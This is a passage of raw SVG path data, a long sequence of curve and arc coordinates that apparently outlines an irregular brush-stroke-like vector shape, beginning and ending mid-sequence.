-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.